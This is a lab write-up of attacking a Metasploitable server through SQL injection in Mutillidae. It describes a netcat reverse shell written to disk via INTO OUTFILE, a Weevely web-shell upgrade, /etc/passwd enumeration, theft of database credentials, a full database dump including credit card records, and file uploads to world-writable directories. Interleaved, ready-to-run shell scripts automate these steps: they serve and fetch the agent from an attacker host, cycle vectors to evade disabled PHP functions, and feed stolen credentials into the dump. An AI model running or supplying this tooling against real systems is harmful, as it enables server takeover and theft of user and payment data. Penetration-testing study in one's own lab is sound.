My Experience on Gaining Access to a Linux Metasploitable Server through an SQLi on Mutillidae And The Post Exploitation Process
Summary
I first obtained a reverse shell from the Linux Metasploitable server via SQL injection in Mutillidae, a deliberately vulnerable web application hosted on that server. I then upgraded the reverse shell to a Weevely shell. In the post-exploitation phase I ran various Weevely modules with different vectors to work around restricted PHP functions, and I downloaded files from and uploaded files to the target web server. All of this was done in my own lab on my own virtual machines (Kali Linux and the Linux Metasploitable server).
1) Gaining a Reverse Shell Connection
I found this SQLi in an HTTP POST request in the user-info section of Mutillidae. I determined the number of columns by trial and error with ORDER BY (increase the column index until the query errors). I now know that 5 columns are selected from the table.
I built my SQL payload around those 5 columns. Also, by removing the ?page= part of the URL we can see which directory we are in while browsing the site as a user. We will need this later when we execute our reverse shell file on the server.
I use Netcat on the attacking machine to listen for incoming connections on port 8888.
This is the payload that follows my username in the request. It uses the PHP function passthru(), which executes whatever command is placed inside its parentheses and quotation marks. Inside it I call Netcat with the address of the machine that is listening for connections and the listening port, so the target connects back to my attacking machine. I set the other columns to NULL so that nothing except my PHP code gets written. I then used the INTO OUTFILE clause and specified where to store the file (in this case the /tmp/ directory on the Mutillidae server). I named the reverse shell file sarpreverse.php.
After submitting this request, my reverse-shell PHP file is stored on the Mutillidae server. All I need to do now is execute it by opening it in my browser.
This is the URL I load. Having learned where I am by removing the ?page= section of the URL, I know I have to go up one directory to reach tmp, where I stored sarpreverse.php.
As can be seen, I have obtained a reverse connection from the Linux Metasploitable server.
2) Upgrading the Reverse Shell to a Weevely Shell
I will generate the Weevely agent as a .txt file first and rename it to .php only after it is on the target server. Until then it must stay .txt: if my web server served it as .php, it would execute the agent instead of serving its source, and I could not download the file including its source code. Weevely needs the agent's source on the target in order to operate.
I hosted this file where both the Linux Metasploitable machine and my Kali machine can reach it. Since I use my own local network, I put it on Kali's local web server; it could equally be hosted on any public website.
Now I need to download this file to the Metasploitable machine from my reverse connection.
Typing pwd shows where this file is stored on the Mutillidae server, so we can work out the URL to use when connecting with Weevely.
After the download I change the file extension to .php so that the Weevely agent executes.
Now I can connect to my Weevely shell.
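The hand-off to Weevely described in the steps above, as an added example rather than the article's own commands: generate the agent as .txt, serve it from Kali, fetch and rename it from inside the reverse shell, and derive the agent's URL from the pwd output. The helper agent_url does the path-to-URL mapping; the addresses, the agent password and the /var/www document root are assumptions.

```sh
#!/bin/sh
# Added example, not the article's own commands: the Weevely hand-off.
# Assumptions: Kali serves /var/www/html over Apache at ATTACKER, the reverse shell lands
# in /var/www/mutillidae on the target, and Apache's document root there is /var/www.
set -u

ATTACKER="${ATTACKER:-192.168.56.1}"        # assumption: Kali IP
TARGET="${TARGET:-http://192.168.56.101}"   # assumption: Metasploitable base URL
AGENT_PASS="${AGENT_PASS:-s3cretpass}"      # assumption: password you choose for the agent

# Map a path reported by `pwd` in the reverse shell to the URL that serves it.
# $1 = base URL of the site, $2 = document root on the target, $3 = absolute path of the agent.
# Fails when the path is outside the document root, because nothing there is served.
agent_url() {
  local base="${1%/}" docroot="${2%/}" path="$3"
  case "$path" in
    "$docroot"/*) printf '%s/%s\n' "$base" "${path#$docroot/}" ;;
    *) echo "$path is outside $docroot and is not served by the web server" >&2; return 1 ;;
  esac
}

if [ "${RUN_ATTACK:-0}" = "1" ]; then
  # 1. Generate the agent with a .txt name so Kali's Apache serves its source as-is.
  weevely generate "$AGENT_PASS" /var/www/html/sarpweevely.txt
  service apache2 start
  # 2. Typed inside the reverse shell on the target (not here):
  #      cd /var/www/mutillidae
  #      wget "http://$ATTACKER/sarpweevely.txt"
  #      mv sarpweevely.txt sarpweevely.php
  #      pwd            # prints /var/www/mutillidae
  # 3. Connect to the agent at the URL derived from that pwd output.
  weevely "$(agent_url "$TARGET" /var/www /var/www/mutillidae/sarpweevely.php)" "$AGENT_PASS"
fi
```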
3) Post Exploitation
3.1) Executing Shell Commands with Vectors / Bypassing Restrictions
The first thing I look at is the information about the system.
I can see the folder where the shell is located, the server IP, the client IP, the OS, the kernel version (useful for privilege escalation), the PHP version (useful when trying to bypass disabled functions), and the user the agent runs as.
I will run a module called audit_etcpasswd, which does roughly what cat /etc/passwd does. (/etc/passwd lists the users on the system and their home directories, which on a shared server often correspond to other document roots, so it can be used to navigate within the server and move from one website to another.) The reason I use audit_etcpasswd is that on many well-secured sites I could not run cat /etc/passwd directly, but with this module I can try different vectors to obtain the same information.
I tried the file vector first.
It did not work. Then I tried posix_getpwuid.
It worked. As can be seen, thanks to this module we can try different vectors until one of them works. In some situations we may get permission denied and cannot run commands on the server as we want to, because the server is configured to prevent the web user from executing them. For that we use another Weevely module, shell_sh, which likewise offers several vectors.
The way this module is used is displayed above.
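Vector fallback as an added example, not the article's commands: a shell function that runs a Weevely module non-interactively with each vector in turn (file, then posix_getpwuid for audit_etcpasswd; system, passthru and so on for shell_sh) and stops at the first one that produces output. It assumes Weevely 3's one-shot form `weevely <url> <password> "<command>"`, an agent URL and password; the vector names are the ones Weevely 3 ships with, so confirm them with `:help <module>` in your version.

```sh
#!/bin/sh
# Added example, not the article's own commands: try a module's vectors in order.
# Assumptions: agent URL and password below; Weevely 3 non-interactive invocation.
set -u

AGENT_URL="${AGENT_URL:-http://192.168.56.101/mutillidae/sarpweevely.php}"
AGENT_PASS="${AGENT_PASS:-s3cretpass}"

# Run one Weevely terminal command non-interactively and print whatever it returns.
weevely_cmd() {
  weevely "$AGENT_URL" "$AGENT_PASS" "$1"
}

# $1 = module, $2 = trailing arguments (may be empty), $3.. = vectors in preference order.
# Prints the output of the first vector that produced any and returns 0; returns 1 when
# every vector came back empty or errored (a disabled PHP function or a denied command).
try_vectors() {
  local module="$1" args="$2" v out
  shift 2
  for v in "$@"; do
    if out=$(weevely_cmd ":$module -vector $v $args" 2>/dev/null) && [ -n "$out" ]; then
      printf 'vector %s worked\n' "$v" >&2
      printf '%s\n' "$out"
      return 0
    fi
  done
  echo "no vector of $module worked" >&2
  return 1
}

if [ "${RUN_ATTACK:-0}" = "1" ]; then
  # /etc/passwd via PHP file read first, then via posix_getpwuid() enumeration.
  try_vectors audit_etcpasswd "" file posix_getpwuid
  # Same idea for arbitrary commands when the default execution function is blocked.
  try_vectors shell_sh "cat /etc/passwd" system passthru shell_exec exec popen proc_open
fi
```

The order of the shell_sh vectors is a preference, not a rule: the one that works depends on which functions disable_functions lists on the target, which is why the PHP version shown by the system-info step matters.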
3.2) Downloading Files From the Target Webserver
Now I can download files from the target web server. Let's look at the files.
My main focus here is the config file, since config files hold the credentials needed to connect to the database.
So let's try shell_sh with the system vector. At higher security levels I may face permission denials with the default shell commands, so I used shell_sh with the system vector instead.
To download the config file to my attacking machine I use the file_download module.
The parameters in this command are the module name, the vector, the rpath (I wrote config.inc because I am currently in the directory where the config file is stored), and the lpath, which is where the file will be saved on the machine I am connecting from.
As you can see, it has been downloaded to the local path I specified on my attacking machine. Let's open Mutillidae's config file.
This information is very useful if I want to connect to Mutillidae's database (accounts, usernames, passwords, etc.).
3.3) Accessing the Database of the Web Application
I use the information from the config file with the sql_dump module. This command lets me dump Mutillidae's database to my machine, read the data and modify it with a text editor.
So I wrote the module name, the vector (the method used to gather the data), the database host, which is localhost, the lpath where I save the dump, and then the database name, user, and password.
As you can see, all of the information in the database is visible in plain text.
The credit_cards table can be reached as well.
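The download and database steps above, combined into one added example (not the article's session): after file_download brings config.inc over, a sed helper pulls $dbhost, $dbuser, $dbpass and $dbname out of the PHP and feeds them into the sql_dump command in the argument order the article lists. The config.inc inside the script is a constructed sample with placeholder values, not the real Metasploitable file; the mysqldump_sh vector name, the file_get_contents vector and the /root paths are assumptions.

```sh
#!/bin/sh
# Added example, not the article's own session: config.inc -> credentials -> sql_dump.
# Assumptions: config.inc assigns $dbhost/$dbuser/$dbpass/$dbname as quoted literals
# (one per line); sql_dump takes "db user passwd" as positionals and has a
# mysqldump_sh vector (check :help sql_dump in your Weevely); /root paths are ours.
set -u

# Read the quoted value of a PHP variable assignment. $1 = name without '$', $2 = file.
# Handles "$name = 'value';" and "$name = \"value\";" with any spacing; not string
# concatenation, escaped quotes or constants, which need a real PHP parser.
php_var() {
  sed -n "s/^[[:space:]]*[$]$1[[:space:]]*=[[:space:]]*['\"]\([^'\"]*\)['\"][[:space:]]*;.*/\1/p" "$2" | head -n 1
}

# Build the Weevely sql_dump invocation. The password is single-quoted so an empty
# password still occupies its positional slot.
sql_dump_cmd() {
  local host="$1" user="$2" pass="$3" db="$4" lpath="$5"
  printf ":sql_dump -vector mysqldump_sh -host %s -lpath %s %s %s '%s'\n" \
         "$host" "$lpath" "$db" "$user" "$pass"
}

# Constructed sample standing in for the downloaded file (placeholder values).
sample_config() {
  cat <<'EOF'
<?php
  $dbhost = 'localhost';
  $dbuser = 'dbadmin';
  $dbpass = 's3cret';
  $dbname = 'owasp10';
?>
EOF
}

# Stand-alone demo on the constructed sample, no target needed.
tmp=$(mktemp)
sample_config > "$tmp"
sql_dump_cmd "$(php_var dbhost "$tmp")" "$(php_var dbuser "$tmp")" \
             "$(php_var dbpass "$tmp")" "$(php_var dbname "$tmp")" /root/mutillidae.sql
rm -f "$tmp"

if [ "${RUN_ATTACK:-0}" = "1" ]; then
  # In the Weevely session first:  :file_download -vector file_get_contents config.inc /root/config.inc
  f=/root/config.inc
  sql_dump_cmd "$(php_var dbhost "$f")" "$(php_var dbuser "$f")" \
               "$(php_var dbpass "$f")" "$(php_var dbname "$f")" /root/mutillidae.sql
fi
```

Paste the printed :sql_dump line into the Weevely session; the dump lands at the lpath on the attacking machine as a plain SQL file, which is why every row, including the credit_cards table, is readable as text.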
3.4) Uploading Files to the Target Webserver
Uploading files can be very useful. We can upload practically any file we want, including a PHP script that executes commands on the server, gets a reverse connection, connects to the database, or browses through the files.
As can be seen, we can write files into these directories because the agent runs as www-data, the web server user that owns the web root in this lab. In effect I can do anything the web server user can do on this site. I upload the file with the file_upload module.
As can be seen, sarpshell-uploaded.txt is stored in the /var/www/mutillidae directory on the Linux Metasploitable machine (Mutillidae's web server).
In many cases, depending on how we gained access to the website, our privileges may be those of the nobody user: whoami then prints nobody instead of www-data. As nobody we cannot upload files wherever we want, only to directories with 777 permissions, i.e. directories that allow anybody to write to them. They show up as drwxrwxrwx in ls -l.
As can be seen, any user can upload any file into the dav directory.
I wanted to show this option for uploading files to the server when we do not have permission to write to the web root.
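The world-writable fallback as an added example, not the article's own commands: a find-based helper that lists every directory under the web root that others can write to, demonstrated on a constructed temporary directory tree, plus the file_upload command for the directory it finds. The paths, the file_put_contents vector and the sarpshell-uploaded.txt name are assumptions taken from the text.

```sh
#!/bin/sh
# Added example, not the article's own commands: find drwxrwxrwx directories under the
# web root and build the file_upload command for them. Assumptions: the Weevely
# file_upload module takes "lpath rpath" and has a file_put_contents vector.
set -u

# Print every directory under $1 whose "others" write bit is set (mode 777 in the
# article's terms). Sticky directories such as /tmp (drwxrwxrwt) match too, but they
# sit outside the web root and files dropped there are never served.
world_writable_dirs() {
  find "$1" -type d -perm -0002 2>/dev/null | sort
}

# Build the Weevely upload command: $1 = local file, $2 = writable remote directory.
file_upload_cmd() {
  local lpath="$1" dir="${2%/}"
  printf ':file_upload -vector file_put_contents %s %s/%s\n' "$lpath" "$dir" "$(basename "$lpath")"
}

# Constructed directory tree standing in for /var/www: only dav is world-writable.
demo_tree() {
  local r
  r=$(mktemp -d)
  mkdir -p "$r/mutillidae/images" "$r/dav"
  chmod 755 "$r/mutillidae" "$r/mutillidae/images"
  chmod 777 "$r/dav"
  printf '%s\n' "$r"
}

# Stand-alone demo: list the writable directories and the upload command for each.
root=$(demo_tree)
world_writable_dirs "$root"
for d in $(world_writable_dirs "$root"); do
  file_upload_cmd /root/sarpshell-uploaded.txt "$d"
done
rm -rf "$root"

if [ "${RUN_ATTACK:-0}" = "1" ]; then
  # On the target, run the find through the agent (:shell_sh or the plain prompt):
  #   find /var/www -type d -perm -0002
  # then paste the printed :file_upload line into the Weevely session.
  file_upload_cmd /root/sarpshell-uploaded.txt /var/www/dav
fi
```

A directory being writable is only half of what the page shows: for the dropped file to be useful as a shell, the web server must also execute PHP from that directory, which is worth checking (a .htaccess with php_flag engine off, or an alias that serves it as static content, defeats the upload even when the write succeeds).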